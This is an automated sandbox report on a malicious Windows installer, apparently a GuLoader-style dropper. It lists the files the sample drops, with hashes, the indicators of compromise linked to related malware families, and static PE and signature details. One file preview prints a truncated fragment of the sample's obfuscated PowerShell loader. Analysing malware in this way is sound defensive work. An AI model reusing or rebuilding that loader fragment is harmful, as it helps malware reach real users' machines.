                                                          Start date and time:2025-01-11 01:28:40 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 52s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:11
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:YrCSUX2O3I.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:d15433cca1e4b6695379317ef0650e4cf9f07fcd5317b8d84343465f3d9186d8.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@6/15@2/2
                                                          EGA Information:
                                                          • Successful, ratio: 50%
                                                          HCA Information:
                                                          • Successful, ratio: 97%
                                                          • Number of executed functions: 33
                                                          • Number of non-executed functions: 28
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          19:29:34API Interceptor38x Sleep call for process: powershell.exe modified
                                                          19:30:44API Interceptor22x Sleep call for process: msiexec.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          s-part-0017.t-0009.t-msedge.nethttp://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                          • 13.107.246.45
                                                          12621132703258916868.jsGet hashmaliciousStrela DownloaderBrowse
                                                          • 13.107.246.45
                                                          Cpfkf79Rzk.exeGet hashmaliciousGuLoaderBrowse
                                                          • 13.107.246.45
                                                          https://noiclethomas.wixsite.com/riceGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 13.107.246.45
                                                          OKkUGRkZV7.exeGet hashmaliciousRemcosBrowse
                                                          • 13.107.246.45
                                                          https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 13.107.246.45

                                                          ASNs

                                                          No context

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          37f463bf4616ecd445d4a1937da06e194AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 142.250.181.225
                                                          • 142.250.184.206
                                                          4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                          • 142.250.181.225
                                                          • 142.250.184.206
                                                          Cpfkf79Rzk.exeGet hashmaliciousGuLoaderBrowse
                                                          • 142.250.181.225
                                                          • 142.250.184.206
                                                          TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 142.250.181.225
                                                          • 142.250.184.206
                                                          Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 142.250.181.225
                                                          • 142.250.184.206
                                                          WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 142.250.181.225
                                                          • 142.250.184.206
                                                          TVPfW4WUdj.exeGet hashmaliciousGuLoaderBrowse
                                                          • 142.250.181.225
                                                          • 142.250.184.206
                                                          WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                          • 142.250.181.225
                                                          • 142.250.184.206
                                                          WtZl31OLfA.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 142.250.181.225
                                                          • 142.250.184.206
                                                          czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 142.250.181.225
                                                          • 142.250.184.206

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):53158
                                                          Entropy (8bit):5.062687652912555
                                                          Encrypted:false
                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dfgtvuk.4lh.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmdksr2i.zte.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmejh5xm.5dh.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvbf3f2z.xys.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Detergenternes.bre

                                                          Download File
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                          Category:dropped
                                                          Size (bytes):486421
                                                          Entropy (8bit):1.2470433609131586
                                                          Encrypted:false
                                                          SSDEEP:1536:p9ffEEX6My2RPkr6vyxsgBVdhrF8pGQkuxMSmLgnrL94:bffg2CJbdlFhh2Mwl4
                                                          MD5:858C7D246EC84B37359FDE23A9F8898A
                                                          SHA1:2046EFB2E9421F1F1C0CABA9F0D7ECCAD1F4AE0F
                                                          SHA-256:100C199A129F94FB16BDD51943FB691AB055CEA690088691C0F989D4C1C75884
                                                          SHA-512:547AA46E6279DD8DF920C2BF21B5A98B47F8B2F81E32FB36678119BC9510CA7D358C38C63E46E71285B76236D46D515CFE7C4DEA37660AE63E533AB78878ABBB
                                                          Malicious:false
                                                          Preview:......................................................................;.............................................................Do.......................................9.....................................................................................8...................T......................................................................................................................................k.............................................................{.(................c.............................).....s..................... ..................N.............q............2..............................................................................................c...................C..........................................G......................`.......|..............7.........0!..................p.........'..............)..........v.z.......................................................................................................[.s............~..A...+..

                                                          C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog

                                                          Download File
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (4591), with CRLF, LF line terminators
                                                          Category:dropped
                                                          Size (bytes):79359
                                                          Entropy (8bit):5.15915298929585
                                                          Encrypted:false
                                                          SSDEEP:1536:m5tb3o74kdusTkb5O+AOycf//ZiD3ueGaHT/VPkjB860myORQS8Cp:K413AK6/03ulazN+BLyO6M
                                                          MD5:A075DC6E560DD3AD9464CC1BB85F9E37
                                                          SHA1:19672DE1F8038EF66A3A5B5A612E27E5F2063D6E
                                                          SHA-256:3655D8F8ACA4048B5935D4DE1D1FEA8B89AF57F4B317B4EF9681DCFC5AEF9170
                                                          SHA-512:D90131C3F8555FB11B6EE86E1D307AD6D2548E15D67B325A8B7DDCB1100BAFCD8A36883076861E61A12995923FB86254EAFC037F5924ED9FEA40D12FDE16A4AB
                                                          Malicious:false
                                                          Preview:$Calcareobituminous140=$Retholter;.....<#Grundfarve Pejlekompasset Diagrammatically Tryllendes Dements Drivgasserne #>..<#ungelatinousness Opmuntrende Stepmother cochleare Kodeordene Kapitalstrkes #>..<#Nominalvrdiers Modtagelser Gibraltars Snvle #>..<#Drugshop Skdeskind Plasmolyse Retsopgret Lipotropic Cynocrambe #>..<#Blepharoblennorrhea Weathercocky Cauked Juwise Stratagematist #>..<#Cucullately Citronmelissens Junktur Allergiske Reformproof #>...$kraners = @'. Rendit.anne re$UndistoUMarcasisOoph retSarongha sensfobSerumaliHeliogrlDbrn rreBla esrs Mater =Artrigr$ArbejdsSstivkradCockshoe jortenlDebateai SeacangPuppi ghFremmeteD kortedDefsi.osinddatef ,seudooUnshrinrepacrisbLatinitrDialogfyNorenekd Rem geeSalgssilAluminysKaf.efle ingefarForbeninMindedieDisjunk;Smrfeds.TaeniosfPalmipeu Over onAbundancPressurtSki,masi,hoppiloemittennSkovtu. restrinSSminkeruSanerinpD.hydraePos ererAssailagKomma dgnynazise CongrinHapticae,ksilsa Reetab(Lunatum$ B shmaHPaviserjWeiersts UltracpMi jforn Ha

                                                          C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exe

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Category:dropped
                                                          Size (bytes):1069784
                                                          Entropy (8bit):7.570387112382367
                                                          Encrypted:false
                                                          SSDEEP:24576:Cj+EenCKbbn+vG0zZpwmNG3Ap137dboaPjyMi76Kby:2+7CKbb+vG0V6t3IRM+i763
                                                          MD5:13DCCF3D94C8435353A3BF886CA19E7E
                                                          SHA1:52474B83A6EA7CF75D1D4986B32E26D87B7074EB
                                                          SHA-256:D15433CCA1E4B6695379317EF0650E4CF9F07FCD5317B8D84343465F3D9186D8
                                                          SHA-512:6F98FFF35A5643660AECD83ABCC9253659C90B3057B8678C999C13A9DBBDB691847BADE8A0760F4ECE647086C427EC44D7A4AEC27AE2649367AD89B08E056CA2
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                          • Antivirus: Virustotal, Detection: 59%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@..........................@.......................................................P...............I...............................................................................................text....`.......b.................. ..`.rdata..`............f..............@..@.data................|..............@....ndata.......P...........................rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\cloner.hol

                                                          Download File
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):457562
                                                          Entropy (8bit):1.2482312628496608
                                                          Encrypted:false
                                                          SSDEEP:1536:2jMpNhAlrasgHvP3V5s9ASYucRtPbRS9y:hpNhX93V5sOSTczjB
                                                          MD5:E4AC954ED484155B2A165BF00B1E8A4F
                                                          SHA1:21ACBAC21538E0258892381807BBE19524DA02E3
                                                          SHA-256:3078C30C80C29C473A796C4E1FE5F89A175D9B23FC88DBCD0262D93B0C67BEED
                                                          SHA-512:A63E484A5CF926E2484B69210BE047B1F90DAC2A0F813E33D2F1B507CC45AF21169AEC9EBEAA6152CDB2448BEE7B09D82E4427C7596E864B09A7A15560D323AC
                                                          Malicious:false
                                                          Preview:.......v......... ....:...........r.........................V.......l...Z...^.....................q........................l.........d.c............................................................Y.........................7.....................................o.....................T.................................T...................................n..............................................................g.3......................................................o.....................................X..0.....................................................:..........................Z?..........................s........O........>.................._.................................P.................................................$.................M.....................1........-..............................................I...........(..............................................................m..............-................................................o.....................

                                                          C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\hickishness.non

                                                          Download File
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):327732
                                                          Entropy (8bit):1.2609335393847756
                                                          Encrypted:false
                                                          SSDEEP:768:rbmwczlydY1vPDT6+VOPnd7avS0bYT7bUkf0+VNt8xT70sob8aN/qfizqd71OFNj:sQdCVXhCo3Vxd/SRgV133ZBLlo
                                                          MD5:622032628F068FE10CC2E51D0502CC9A
                                                          SHA1:5AE897F10B51533C20489B755F4395FCED7EB67C
                                                          SHA-256:840F31C02A7A8CA755C4CD53619D9F93BB42848DD334B25A0A3C72B13F5753F4
                                                          SHA-512:2E5C98D7E3FE856D22381B2B97BAC5DF50C82859CB62DCF1D2FE3386B79D96446887FECB59D43F924200532399307E3846DDECA33FB87A286ADD5E6CEFC10637
                                                          Malicious:false
                                                          Preview:.).............\....................).....................q............A.....c..................................[..,........................(...................................................................}...................................................^................`.................................%.............................................................................L....................~d...............N..........................................h......~.............................~.........B...................Z....0..........................q................................v.......................................k............Y.............................................|..................................................................1.................T......................................................................................................................k........................................D...-.V..z...'........................................

                                                          C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\hogni.opd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):433848
                                                          Entropy (8bit):1.255481788885247
                                                          Encrypted:false
                                                          SSDEEP:768:8agBmxdiio94Vue1rGruEhQHTvyGPHzfrm75zidpc8oUH392slzddIRzyP98UmYu:NgKjnn/NnW5hQAPAfMqoDH+bI
                                                          MD5:7586252625434A405256063977B84D0D
                                                          SHA1:BA800F4510A4940F6EA11F866E3F4AF9805BDFD4
                                                          SHA-256:5AFA5BC29281632F196999E16D8F4B26F2C14EC6A8A5F589DC5932B6DE78A2A7
                                                          SHA-512:613E03C6EC8DFBE0B2B6A450B30B932157FE40121E6A7E4AE9FB188193AB6E5D3CA044F30351A3E969FD84BAC8BC7AD2B7DD5E9D0BB091FEDE0546CC9E3A3856
                                                          Malicious:false
                                                          Preview:...............1.............L..................................................................3...............................m...............................................................................................y...........n.................A................G...........$............................m.........................X..............................................................................5.....G.............^....................................\........v.....................-......................................................."............................V........0....................G.........................................................................................................#.....B...............V.....................x............U......................T................................>.................w..............;.....................................L.....................................................................y,.................

                                                          C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\solvejg.non

                                                          Download File
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):327124
                                                          Entropy (8bit):1.2472891497347776
                                                          Encrypted:false
                                                          SSDEEP:768:qw1bcEnP59OCTltLumdIdNK2mkVYYHN44jjU5S6EP1KRuM/VTCo0oXATL4bYZcOO:jucypY8Gyju3O4/iALDvWJTAnjPqqaO
                                                          MD5:0EC84A842970A2C0B04893F66217F733
                                                          SHA1:E100ACDACE598C27B00E0AF658306942A70228FC
                                                          SHA-256:6B3552FC5295BE3AE9FADD8AFA8A06103BD60DDB6E0BE924C61B346895505A7A
                                                          SHA-512:27270395859FEF2B270B7C2C70FA587BAF4FDCFF742DA93B6F7D1B0B82B5B1FF0BA9004BD3B825A9A62FAE75FB0F792A176ECE980529B61A2FEADE958B8B0BFB
                                                          Malicious:false
                                                          Preview:................:............................q......................[.................c.....................................{.... ..................................K....U............4.........................................@.........................................................\...............e...........................3................J.........L*....................................................................................(.......@..........................................................................g....................4.............................b.......2...............................p.....t.......................4\.................&......d...........................................................................................k......k........................................................................................................................................................................................\....................................0........M

                                                          C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Vara183.Bib

                                                          Download File
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):324744
                                                          Entropy (8bit):7.708227271496816
                                                          Encrypted:false
                                                          SSDEEP:6144:jk+3s9V9YuDKUL6x6b1v0V2MIruRc7bMJ//rMsOAq12ZeWbI1:jkNY2KUicv0tARMJQsOAw
                                                          MD5:F62EAE8CE9F6C249DC71B48D0D0719B9
                                                          SHA1:A1A29C8B7FDE15F7EFF8555D87191094E12D77AD
                                                          SHA-256:BEFC15D7D141B2D2193D73DA595FC799FE704617C134C50F744F666ED24F76AB
                                                          SHA-512:40DB79BE81CBCB79867F8C8147C7ECECF0604A729C030B2A636F8C0DF27D1297A9DF93D9F862009FA2FD0A24D198114842BF645D741D2272F5928B3097FD9983
                                                          Malicious:false
                                                          Preview:.......uuuu........=.....WWWWW.........F..&..........hhhh..................__...................m.......zzz.............................,,.........I..n...........................kkk..............2222222... ...........................%%%%%..aa.!!.....G.........[......QQ.......m.G..................................B....I........)).......l...................l....%%.LLLL..............y.L...<<.....`.......#........T...............KK.,,,,............a.....77......................................................".......6......MMM......N...........\......s.;;....n.............................w..... ...VV.....,.....I.........m.==........ooo.I....9.U............................|........... ...{.HH....dd....||.............??...............................:...........SSS.....hh....h.......---...^..rr....................................JJJ.............22....EEE............x.............D.......+......==...........88.............oooooo......l................S..................222.....mm........)..3..

                                                          C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\brugerinstallation.cry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0, imaginary
                                                          Category:dropped
                                                          Size (bytes):462783
                                                          Entropy (8bit):1.2514895750557933
                                                          Encrypted:false
                                                          SSDEEP:1536:gR0px6Iw5kvIV8FuWk8mGWwi1BoFIN8oYd:jmIwavC6utxgIjYd
                                                          MD5:77218C2134D28A666F2FDEAA5E452489
                                                          SHA1:16E2234D9C2F4E4265D1362887B40149B9E31823
                                                          SHA-256:A901A3525DC18A4A9E6EF655931252D8258D954D419FCE81668F251C8EF54EE5
                                                          SHA-512:AFE9F39C392A6DE29B551393CB032534D04AA18B82E747406A23828DE7B4088FBA3045F0DD8ECC37C3A4FE45125605C0504EA8A1C38DA429624A35753E8E3ED2
                                                          Malicious:false
                                                          Preview:....................]l................pq......................................................................................................p..........................................&...........................................................................].................v.................,.............................................................*.........................+........2.............................GI=..............,............................I............to....{........................8...........f..........XF.........O.............................................................].................-....................+........................2...........................B......................m.....^......................................................................................z....;.........x.....................................................................................................................4.............6...6............s.................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Entropy (8bit):7.570387112382367
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:YrCSUX2O3I.exe
                                                          File size:1'069'784 bytes
                                                          MD5:13dccf3d94c8435353a3bf886ca19e7e
                                                          SHA1:52474b83a6ea7cf75d1d4986b32e26d87b7074eb
                                                          SHA256:d15433cca1e4b6695379317ef0650e4cf9f07fcd5317b8d84343465f3d9186d8
                                                          SHA512:6f98fff35a5643660aecd83abcc9253659c90b3057b8678c999c13a9dbbdb691847bade8a0760f4ece647086c427ec44d7a4aec27ae2649367ad89b08e056ca2
                                                          SSDEEP:24576:Cj+EenCKbbn+vG0zZpwmNG3Ap137dboaPjyMi76Kby:2+7CKbb+vG0V6t3IRM+i763
                                                          TLSH:BA3523523690904ED8B55A36DA1BD53D4839EE1CEC900B0367943F8F793A6D2BC7928F
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@

                                                          File Icon

                                                          Icon Hash:0d4f7fd151493b07

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4031dd
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x519965E1 [Sun May 19 23:53:05 2013 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:7fd61eafe142870d6d0380163804a642

                                                          Authenticode Signature

                                                          Signature Valid:false
                                                          Signature Issuer:CN=Hjertekamret, O=Hjertekamret, L=Glen, C=US
                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                          Error Number:-2146762487
                                                          Not Before, Not After
                                                          • 07/02/2024 09:50:23 06/02/2027 09:50:23
                                                          Subject Chain
                                                          • CN=Hjertekamret, O=Hjertekamret, L=Glen, C=US
                                                          Version:3
                                                          Thumbprint MD5:108C4654F891FC9B117C8F6C328C22B7
                                                          Thumbprint SHA-1:8667A216D1553E591D1C626D7789CEC7AF7DF569
                                                          Thumbprint SHA-256:15CCC1C60C75757EAF7411D5B752DE7E146D3AA3E52E7D308152023C8251C582
                                                          Serial:47B3C151C2CAF5A93B7F5076B707BD8C3B1142E8

                                                          Entrypoint Preview

                                                          Instruction
                                                          sub esp, 000002D4h
                                                          push ebx
                                                          push ebp
                                                          push esi
                                                          push edi
                                                          push 00000020h
                                                          xor ebp, ebp
                                                          pop esi
                                                          mov dword ptr [esp+18h], ebp
                                                          mov dword ptr [esp+10h], 0040A2D8h
                                                          mov dword ptr [esp+14h], ebp
                                                          call dword ptr [00408034h]
                                                          push 00008001h
                                                          call dword ptr [00408134h]
                                                          push ebp
                                                          call dword ptr [004082ACh]
                                                          push 00000008h
                                                          mov dword ptr [00434F58h], eax
                                                          call 00007F61EC8A62D5h
                                                          mov dword ptr [00434EA4h], eax
                                                          push ebp
                                                          lea eax, dword ptr [esp+34h]
                                                          push 000002B4h
                                                          push eax
                                                          push ebp
                                                          push 0042B1B8h
                                                          call dword ptr [0040817Ch]
                                                          push 0040A2C0h
                                                          push 00433EA0h
                                                          call 00007F61EC8A5F40h
                                                          call dword ptr [00408138h]
                                                          mov ebx, 0043F000h
                                                          push eax
                                                          push ebx
                                                          call 00007F61EC8A5F2Eh
                                                          push ebp
                                                          call dword ptr [0040810Ch]
                                                          cmp word ptr [0043F000h], 0022h
                                                          mov dword ptr [00434EA0h], eax
                                                          mov eax, ebx
                                                          jne 00007F61EC8A344Ah
                                                          push 00000022h
                                                          mov eax, 0043F002h
                                                          pop esi
                                                          push esi
                                                          push eax
                                                          call 00007F61EC8A599Ch
                                                          push eax
                                                          call dword ptr [00408240h]
                                                          mov dword ptr [esp+1Ch], eax
                                                          jmp 00007F61EC8A3509h
                                                          push 00000020h
                                                          pop edx
                                                          cmp cx, dx
                                                          jne 00007F61EC8A3449h
                                                          inc eax
                                                          inc eax
                                                          cmp word ptr [eax], dx
                                                          je 00007F61EC8A343Bh
